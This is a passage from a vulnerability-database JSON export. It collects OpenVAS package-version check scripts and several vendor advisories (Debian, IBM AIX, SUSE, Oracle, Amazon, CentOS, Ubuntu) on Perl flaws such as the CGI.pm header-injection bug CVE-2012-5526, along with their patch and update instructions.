2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2012/dsa-2587.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libcgi-pm-perl\", ver:\"3.49-1squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-03-18T14:42:13", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-11-29T00:00:00", "id": "OPENVAS:1361412562310864899", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864899", "title": "Fedora Update for perl-CGI FEDORA-2012-18318", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for perl-CGI FEDORA-2012-18318\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-November/093398.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864899\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-11-29 09:37:38 +0530 (Thu, 29 Nov 2012)\");\n script_cve_id(\"CVE-2012-5526\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-18318\");\n script_name(\"Fedora Update for perl-CGI FEDORA-2012-18318\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'perl-CGI'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"perl-CGI on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.51~7.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "debian": [{"lastseen": "2018-10-16T22:13:59", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2587-1 security@debian.org\nhttp://www.debian.org/security/ \nDecember 11, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libcgi-pm-perl\nVulnerability : HTTP header injection\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5526\nDebian Bug : 693421\n\nIt was discovered that the CGI module for Perl does not filter LF\ncharacters in the Set-Cookie and P3P headers, potentially allowing\nattackers to inject HTTP headers.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.49-1squeeze2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.61-2.\n\nWe recommend that you upgrade your libcgi-pm-perl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2012-12-11T20:36:09", "published": "2012-12-11T20:36:09", "id": "DEBIAN:DSA-2587-1:C94C7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00231.html", "title": "[SECURITY] [DSA 2587-1] libcgi-pm-perl security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-16T22:12:46", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2586-1 security@debian.org\nhttp://www.debian.org/security/ \nDecember 11, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : perl\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5195 CVE-2012-5526\nDebian Bug : 689314 693420 695223\n\nTwo vulnerabilities were discovered in the implementation of the Perl\nprogramming language:\n\nCVE-2012-5195\n\tThe "x" operator could cause the Perl interpreter to crash\n\tif very long strings were created.\n\nCVE-2012-5526\n\tThe CGI module does not properly escape LF characters\n\tin the Set-Cookie and P3P headers.\n\nIn addition, this update adds a warning to the Storable documentation\nthat this package is not suitable for deserializing untrusted data.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 5.10.1-17squeeze4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 5.14.2-16.\n\nWe recommend that you upgrade your perl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2012-12-11T19:11:33", "published": "2012-12-11T19:11:33", "id": "DEBIAN:DSA-2586-1:65FFB", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00230.html", "title": "[SECURITY] [DSA 2586-1] perl security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "aix": [{"lastseen": "2018-08-31T00:08:35", "bulletinFamily": "unix", "description": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nIBM SECURITY ADVISORY\n\nFirst Issued: Wed Nov 20 13:06:27 CST 2013\n|Updated: Wed Dec 4 10:00:31 CST 2013\n|Update: Corrected CVSS scoring information for CVEs\n|Update: Includes AIX 5.3 in appropriate places\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/perl_advisory3.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Security vulnerabilities in Perl for AIX\n\n| PLATFORMS: 5.3, 6.1 and 7.1\n\nSOLUTION: Apply the fix as described below.\n\nTHREAT: See below.\n\nCVE Number: CVE-2012-5526 \n CVE-2013-1667\n\nReboot required? NO\nWorkarounds? NO\nProtected by FPM? NO\nProtected by SED? NO\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION\n\n CVE-2012-5526\n -------------\n Perl does not properly escape newlines in (1) Set-Cookie or (2) P3P \n headers, which might allow remote attackers to inject arbitrary headers \n into responses from applications that use CGI.pm\n\n CVE-2013-1667\n -------------\n The rehash mechanism in Perl 5.8.2 through 5.16.x allows \n context-dependent attackers to cause a denial of service (memory \n consumption and crash) via a crafted hash key.\n\nII. CVSS\n\n| CVE-2012-5526\n| CVSS Base Score: 4.3\n| CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/80098 for\n| the current score\n| CVSS Environmental Score*: Undefined\n| CVSS String: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n| CVE-2013-1667\n| CVSS Base Score: 4.3\n| CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/82598 for the\n| current score\n| CVSS Environmental Score*: Undefined\n| CVSS String:(AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n To determine if your system is vulnerable, run the following\n command:\n\n # lslpp -l perl.rte\n\n The following fileset levels are vulnerable:\n\n AIX Fileset AIX Level Lower Level Upper Level\n ----------------------------------------------------------------\n| perl.rte 5.3.12 5.8.8.0 5.8.8.123\n perl.rte 6.1.7 5.8.8.0 5.8.8.122\n perl.rte 6.1.8 5.8.8.0 5.8.8.244\n perl.rte 7.1.1 5.10.1.0 5.10.1.100\n perl.rte 7.1.2 5.10.1.0 5.10.1.150\n\n NOTE: Affected customers are urged to upgrade to the latest\n applicable Technology Level and Service Pack.\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability\n ---------------------------------------------------\n| 5.3.12 IV43973 NOW\n 6.1.8 IV43973 NOW\n 7.1.2 IV46765 NOW\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV43973\n http://www.ibm.com/support/docview.wss?uid=isg1IV46765\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via http\n from:\n\n\t\thttps://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp\n\n\t\tThe perl name provided in the web pack site\n| For 5.3:\tperl61.zip\n For 6.1:\tperl61.zip\n For 7.1:\tperl71.zip\n\n To extract the fixes from the zip files:\n\n| For 5.3: \tgunzip -S .zip perl61.zip\n For 6.1: \tgunzip -S .zip perl61.zip\n For 7.1:\tgunzip -S .zip perl71.zip\n\n\t\tIMPORTANT: It is recommended that a mksysb backup of the system be\n\t\tcreated. Verify that this image is both bootable and readable\n\t\tbefore proceeding.\n\n\t\tTo preview the fix installation:\n\n \t\t\tinstallp -apYd . perl\t\t\t\n\n\t\tTo install the fix package:\n\t\n\t\t\tinstallp -aXYd . perl\n\t\t\nV. WORKAROUNDS\n\n There are no workarounds.\n\nVI. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit:\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt\n\n C. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\nVII. ACKNOWLEDGMENTS\n\n IBM discovered and fixed this vulnerability as part of its\n commitment to secure the AIX operating system.\n\nVIII. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n| X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/80098\n| X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/82598\n CVE-2012-5526: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5526\n CVE-2013-1667: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1667\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (AIX)\n\niEYEARECAAYFAlKfsRYACgkQ4fmd+Ci/qhIKJQCff1qIjiUT9DQ4psgBq2Nyx/tD\nEnMAmwUQKbqT0QRty7dMeNNHpNX5oEbS\n=2MWR\n-----END PGP SIGNATURE-----\n", "modified": "2013-12-04T10:00:31", "published": "2013-11-20T13:06:27", "id": "PERL_ADVISORY3.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/perl_advisory3.asc", "title": "Security vulnerabilities in Perl for AIX", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:17:41", "bulletinFamily": "unix", "description": "Perl was updated to fix 3 security issues:\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\n In openSUSE 12.1 also the following non-security bug was\n fixed:\n - fix IPC::Open3 bug when '-' is used [bnc#755278]\n\n", "modified": "2013-03-20T11:05:11", "published": "2013-03-20T11:05:11", "id": "OPENSUSE-SU-2013:0497-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00037.html", "type": "suse", "title": "update for perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:28:41", "bulletinFamily": "unix", "description": "Perl was updated to fix 3 security issues:\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\n", "modified": "2013-03-20T14:04:22", "published": "2013-03-20T14:04:22", "id": "OPENSUSE-SU-2013:0502-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00038.html", "type": "suse", "title": "update for perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:40:22", "bulletinFamily": "unix", "description": "This update of Perl 5 fixes the following security issues:\n\n * fix rehash DoS [bnc#804415] [CVE-2013-1667]\n * improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n * fix glob denial of service [bnc#796014]\n [CVE-2011-2728]\n * sanitize input in Maketext.pm [bnc#797060]\n [CVE-2012-6329]\n * make getgrent work with long group entries\n [bnc#788388]\n", "modified": "2013-03-13T00:05:41", "published": "2013-03-13T00:05:41", "id": "SUSE-SU-2013:0442-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00015.html", "title": "Security update for Perl (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:48:10", "bulletinFamily": "unix", "description": "This update of Perl 5 fixes the following security issues:\n\n * fix rehash DoS [bnc#804415] [CVE-2013-1667]\n * improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n * fix glob denial of service [bnc#796014]\n [CVE-2011-2728]\n * sanitize input in Maketext.pm [bnc#797060]\n [CVE-2012-6329]\n", "modified": "2013-03-13T00:05:35", "published": "2013-03-13T00:05:35", "id": "SUSE-SU-2013:0441-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00014.html", "type": "suse", "title": "Security update for Perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:41:38", "bulletinFamily": "unix", "description": "[4:5.10.1-130]\n- Resolves: #915692 - CVE-2012-5526 (newline injection due to improper CRLF\n escaping in Set-Cookie and P3P headers)\n- Resolves: #915692 - CVE-2012-6329 (possible arbitrary code execution via\n Locale::Maketext)\n- Resolves: #915692 - CVE-2013-1667 (DoS in rehashing code)", "modified": "2013-03-26T00:00:00", "published": "2013-03-26T00:00:00", "id": "ELSA-2013-0685", "href": "http://linux.oracle.com/errata/ELSA-2013-0685.html", "title": "perl security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:19", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA heap overflow flaw was found in Perl. If a Perl application allowed user input to control the count argument of the string repeat operator, an attacker could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. ([CVE-2012-5195 __](<https://access.redhat.com/security/cve/CVE-2012-5195>))\n\nA denial of service flaw was found in the way Perl's rehashing code implementation, responsible for recalculation of hash keys and redistribution of hash content, handled certain input. If an attacker supplied specially-crafted input to be used as hash keys by a Perl application, it could cause excessive memory consumption. ([CVE-2013-1667 __](<https://access.redhat.com/security/cve/CVE-2013-1667>))\n\nIt was found that the Perl CGI module, used to handle Common Gateway Interface requests and responses, incorrectly sanitized the values for Set-Cookie and P3P headers. If a Perl application using the CGI module reused cookies values and accepted untrusted input from web browsers, a remote attacker could use this flaw to alter member items of the cookie or add new items. ([CVE-2012-5526 __](<https://access.redhat.com/security/cve/CVE-2012-5526>))\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl applications, did not properly handle backslashes or fully-qualified method names. An attacker could possibly use this flaw to execute arbitrary Perl code with the privileges of a Perl application that uses untrusted Locale::Maketext templates. ([CVE-2012-6329 __](<https://access.redhat.com/security/cve/CVE-2012-6329>))\n\n \n**Affected Packages:** \n\n\nperl\n\n \n**Issue Correction:** \nRun _yum update perl_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n perl-suidperl-5.10.1-130.17.amzn1.i686 \n perl-Pod-Escapes-1.04-130.17.amzn1.i686 \n perl-libs-5.10.1-130.17.amzn1.i686 \n perl-version-0.77-130.17.amzn1.i686 \n perl-IO-Compress-Base-2.020-130.17.amzn1.i686 \n perl-Archive-Tar-1.58-130.17.amzn1.i686 \n perl-Test-Harness-3.17-130.17.amzn1.i686 \n perl-Module-Load-0.16-130.17.amzn1.i686 \n perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.i686 \n perl-Archive-Extract-0.38-130.17.amzn1.i686 \n perl-IO-Compress-Bzip2-2.020-130.17.amzn1.i686 \n perl-IPC-Cmd-0.56-130.17.amzn1.i686 \n perl-CGI-3.51-130.17.amzn1.i686 \n perl-Term-UI-0.20-130.17.amzn1.i686 \n perl-5.10.1-130.17.amzn1.i686 \n perl-ExtUtils-CBuilder-0.27-130.17.amzn1.i686 \n perl-Package-Constants-0.02-130.17.amzn1.i686 \n perl-Module-Loaded-0.02-130.17.amzn1.i686 \n perl-core-5.10.1-130.17.amzn1.i686 \n perl-Object-Accessor-0.34-130.17.amzn1.i686 \n perl-Compress-Raw-Zlib-2.023-130.17.amzn1.i686 \n perl-devel-5.10.1-130.17.amzn1.i686 \n perl-Module-CoreList-2.18-130.17.amzn1.i686 \n perl-Test-Simple-0.92-130.17.amzn1.i686 \n perl-debuginfo-5.10.1-130.17.amzn1.i686 \n perl-Locale-Maketext-Simple-0.18-130.17.amzn1.i686 \n perl-CPANPLUS-0.88-130.17.amzn1.i686 \n perl-Parse-CPAN-Meta-1.40-130.17.amzn1.i686 \n perl-IO-Zlib-1.09-130.17.amzn1.i686 \n perl-ExtUtils-Embed-1.28-130.17.amzn1.i686 \n perl-Digest-SHA-5.47-130.17.amzn1.i686 \n perl-Compress-Zlib-2.020-130.17.amzn1.i686 \n perl-Params-Check-0.26-130.17.amzn1.i686 \n perl-Time-HiRes-1.9721-130.17.amzn1.i686 \n perl-Module-Build-0.3500-130.17.amzn1.i686 \n perl-Time-Piece-1.15-130.17.amzn1.i686 \n perl-Log-Message-0.02-130.17.amzn1.i686 \n perl-Module-Pluggable-3.90-130.17.amzn1.i686 \n perl-CPAN-1.9402-130.17.amzn1.i686 \n perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.i686 \n perl-Log-Message-Simple-0.04-130.17.amzn1.i686 \n perl-Pod-Simple-3.13-130.17.amzn1.i686 \n perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.i686 \n perl-Module-Load-Conditional-0.30-130.17.amzn1.i686 \n perl-IO-Compress-Zlib-2.020-130.17.amzn1.i686 \n perl-parent-0.221-130.17.amzn1.i686 \n perl-File-Fetch-0.26-130.17.amzn1.i686 \n \n src: \n perl-5.10.1-130.17.amzn1.src \n \n x86_64: \n perl-Compress-Raw-Zlib-2.023-130.17.amzn1.x86_64 \n perl-Archive-Tar-1.58-130.17.amzn1.x86_64 \n perl-CGI-3.51-130.17.amzn1.x86_64 \n perl-devel-5.10.1-130.17.amzn1.x86_64 \n perl-ExtUtils-Embed-1.28-130.17.amzn1.x86_64 \n perl-CPAN-1.9402-130.17.amzn1.x86_64 \n perl-Pod-Escapes-1.04-130.17.amzn1.x86_64 \n perl-parent-0.221-130.17.amzn1.x86_64 \n perl-Module-Loaded-0.02-130.17.amzn1.x86_64 \n perl-Module-Pluggable-3.90-130.17.amzn1.x86_64 \n perl-Module-CoreList-2.18-130.17.amzn1.x86_64 \n perl-Archive-Extract-0.38-130.17.amzn1.x86_64 \n perl-IO-Zlib-1.09-130.17.amzn1.x86_64 \n perl-IO-Compress-Base-2.020-130.17.amzn1.x86_64 \n perl-Log-Message-Simple-0.04-130.17.amzn1.x86_64 \n perl-CPANPLUS-0.88-130.17.amzn1.x86_64 \n perl-Test-Simple-0.92-130.17.amzn1.x86_64 \n perl-suidperl-5.10.1-130.17.amzn1.x86_64 \n perl-debuginfo-5.10.1-130.17.amzn1.x86_64 \n perl-Params-Check-0.26-130.17.amzn1.x86_64 \n perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.x86_64 \n perl-Term-UI-0.20-130.17.amzn1.x86_64 \n perl-ExtUtils-CBuilder-0.27-130.17.amzn1.x86_64 \n perl-Time-HiRes-1.9721-130.17.amzn1.x86_64 \n perl-Digest-SHA-5.47-130.17.amzn1.x86_64 \n perl-Object-Accessor-0.34-130.17.amzn1.x86_64 \n perl-Log-Message-0.02-130.17.amzn1.x86_64 \n perl-Time-Piece-1.15-130.17.amzn1.x86_64 \n perl-Module-Build-0.3500-130.17.amzn1.x86_64 \n perl-Compress-Zlib-2.020-130.17.amzn1.x86_64 \n perl-libs-5.10.1-130.17.amzn1.x86_64 \n perl-version-0.77-130.17.amzn1.x86_64 \n perl-Module-Load-Conditional-0.30-130.17.amzn1.x86_64 \n perl-IO-Compress-Zlib-2.020-130.17.amzn1.x86_64 \n perl-File-Fetch-0.26-130.17.amzn1.x86_64 \n perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.x86_64 \n perl-Parse-CPAN-Meta-1.40-130.17.amzn1.x86_64 \n perl-Package-Constants-0.02-130.17.amzn1.x86_64 \n perl-IPC-Cmd-0.56-130.17.amzn1.x86_64 \n perl-core-5.10.1-130.17.amzn1.x86_64 \n perl-Module-Load-0.16-130.17.amzn1.x86_64 \n perl-Test-Harness-3.17-130.17.amzn1.x86_64 \n perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.x86_64 \n perl-5.10.1-130.17.amzn1.x86_64 \n perl-IO-Compress-Bzip2-2.020-130.17.amzn1.x86_64 \n perl-Locale-Maketext-Simple-0.18-130.17.amzn1.x86_64 \n perl-Pod-Simple-3.13-130.17.amzn1.x86_64 \n \n \n", "modified": "2014-09-15T22:48:00", "published": "2014-09-15T22:48:00", "id": "ALAS-2013-177", "href": "https://alas.aws.amazon.com/ALAS-2013-177.html", "title": "Medium: perl", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-03T18:26:57", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:0685\n\n\nPerl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat operator, an\nattacker could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially-crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption. (CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers, a\nremote attacker could use this flaw to alter member items of the cookie or\nadd new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl\napplications, did not properly handle backslashes or fully-qualified method\nnames. An attacker could possibly use this flaw to execute arbitrary Perl\ncode with the privileges of a Perl application that uses untrusted\nLocale::Maketext templates. (CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting CVE-2012-5195\nand CVE-2013-1667. Upstream acknowledges Tim Brown as the original\nreporter of CVE-2012-5195 and Yves Orton as the original reporter of\nCVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/019668.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/019669.html\n\n**Affected packages:**\nperl\nperl-Archive-Extract\nperl-Archive-Tar\nperl-CGI\nperl-CPAN\nperl-CPANPLUS\nperl-Compress-Raw-Bzip2\nperl-Compress-Raw-Zlib\nperl-Compress-Zlib\nperl-Digest-SHA\nperl-ExtUtils-CBuilder\nperl-ExtUtils-Embed\nperl-ExtUtils-MakeMaker\nperl-ExtUtils-ParseXS\nperl-File-Fetch\nperl-IO-Compress-Base\nperl-IO-Compress-Bzip2\nperl-IO-Compress-Zlib\nperl-IO-Zlib\nperl-IPC-Cmd\nperl-Locale-Maketext-Simple\nperl-Log-Message\nperl-Log-Message-Simple\nperl-Module-Build\nperl-Module-CoreList\nperl-Module-Load\nperl-Module-Load-Conditional\nperl-Module-Loaded\nperl-Module-Pluggable\nperl-Object-Accessor\nperl-Package-Constants\nperl-Params-Check\nperl-Parse-CPAN-Meta\nperl-Pod-Escapes\nperl-Pod-Simple\nperl-Term-UI\nperl-Test-Harness\nperl-Test-Simple\nperl-Time-HiRes\nperl-Time-Piece\nperl-core\nperl-devel\nperl-libs\nperl-parent\nperl-suidperl\nperl-version\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0685.html", "modified": "2013-03-26T22:29:30", "published": "2013-03-26T21:05:02", "href": "http://lists.centos.org/pipermail/centos-announce/2013-March/019668.html", "id": "CESA-2013:0685", "title": "perl security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:07", "bulletinFamily": "unix", "description": "It was discovered that the decode_xs function in the Encode module is vulnerable to a heap-based buffer overflow via a crafted Unicode string. An attacker could use this overflow to cause a denial of service. (CVE-2011-2939)\n\nIt was discovered that the \u2018new\u2019 constructor in the Digest module is vulnerable to an eval injection. An attacker could use this to execute arbitrary code. (CVE-2011-3597)\n\nIt was discovered that Perl\u2019s \u2018x\u2019 string repeat operator is vulnerable to a heap-based buffer overflow. An attacker could use this to execute arbitrary code. 